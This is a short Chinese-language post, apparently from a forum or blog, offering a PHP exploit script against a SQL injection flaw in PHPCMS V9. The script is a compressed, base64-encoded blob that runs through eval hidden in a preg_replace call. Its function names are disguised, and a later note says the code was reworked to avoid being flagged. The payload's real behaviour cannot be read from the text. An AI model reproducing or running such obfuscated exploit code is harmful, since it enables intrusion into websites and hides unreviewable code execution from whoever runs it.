PHPCMS V9版SQL注入漏洞,详细内容请见,http://webscan.360.cn/news/news84 ,网上有人已经写出了python版的,我再送一个php版的吧,写的不怎么样,能用而已。加个密是防有些人转载过去,乱改,bs转载不留版权的。

代码如下:复制保存为 *.php即可使用

<?php
$enfile="rVXfb9tUFH6PlP/htKtqu7VjOx2jTQnTKNk6qWXVmvFDdIpu7evEqu1rrm8ad4h/hj4AEg8UhWlqy0AtSIWBqEZhEuKNaS99REKTEBLnXjdT1jIhMZzIce79zo97znc+l0uQ8jARLa5r5dKk9Z+uyXIJhq+l+aW5xeXW6zOQskxQ3vKi0FuDB+8fHDfeXDoFXg4F3dzuCJHWbLvX61V6JBQkYgmteIl9CoxXI08jFgp45a3Nbbj95YOjzw76f52FATTDGB1XHXfKcqqWc+F5jqcZsxAGoI8R3vbgJZgy4N3/p3A3MkratAZpJwUNKiAjrL/t3MRHDTpYPkiJ6JRL8/hYA4G7VEBG+TrloIepLSEJialRLi0hsKbgIJh06MVZudTISZxGz4oQMY9EKow9MHg+EshK0TwUs/AeUM4Zb3GaMi7CpK2/iHtjGZ5BtAQ2B+oQdBNPPetyS+VRP0nQvYkr6jCDlapc6fIIFzQ7THyaVzDni3G9YNm4V1eL46Q+TLvxDAmWpcSjoV93x+VNK5o5knLabsVEeB1ds1/tpggngtqaiUXciBjxdRnOMGSz/ZDqo1sf3nnU//3g3ubH3z/+6e6nO/1HR7/07+19dLtvfvXbF9/cP9r97vDx/vEPe/d37vwxspKMGqoMUUbRQ8A4JV4HdE6SNtUdE1zHAJLBWCgDyIyeSmhFO6dXJoxzrn3jVEYmWpgwxmnWjYTKjnodBtqP+zsf7P+5+8n+r3vHm9uy16HHknVd64rAmkYnWnt1TXtiiSU2EDOKeco05Uf2Q4QsOR2u7sgo7Yitkqjok1k0BzviE0GwJaNXGk0YlfxSTUO/qlcw32wu2W7FXeEqTgGvIL5gtHJ2Zg+ngluX2jRBxCK7FUYRsV+oOKC/gS1mvQxea8KFijsLfL3mTlcwuyvUW2M2TruDXxcuh5wGLLfl5hnv12lAOeU15D9JfD2jEfUEuBBwFg/+eaybCH3CMLGCyAp9sP7kd7mx0JhrIi8y5LYyUDgnr06ZXUxfDqXp5FPETEmW9Rj3i3808fhGKkwJNODy9WuLsD7TIn4cJnCN+zjWqxsgHYQ+LFxdvNpEfpgudllmB2GCNEKGYI9amdehMakIshrRDKIwRlV0EGoGEWNc0szXHWOiahj5vxm3OeumMnBuEEMWBTRXq2tnm3bJ82gqhYjmwu6IODJJWswNOrVzuTKZn16No9l36k5lxpywJ9TT9Bm/cywR2G2ruZGiVD1lbeFLwZKJW8gnrB7zqf+MvKwFHK2u0tNbHctLTOT7P4VKqGJ5DeYillGJGKCCVKpSxpBMKU30E6pPOyf6P4KAgRpoJ46k2Crlaki509TIBz2OqqMj2iwiS3lbJfgSRO1C+el1woiiu4CyQKLUEBcATDFAofALY9epni88ejJVhUXWU9HlSWEwOzy2Q3qKDiPkpj4Whx5HUw8zwbuBGVD5CvXxBIBioLYLkyHPAyOYVFZKxpTGfP711t2f+4eH327tPiw0BqmDRNOHQ1vDMo9SdV7qjLZ/jCe/+HK59Dc=";
$b=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef");
$g=str_replace('X','','gXXzXXiXXnXXXXfXXXlXXaXXXtXXXXXe');
preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a');
?>

2012/02/07重新更改一下代码,以前的容易误判,现在可以了。。请兄弟们重新保存!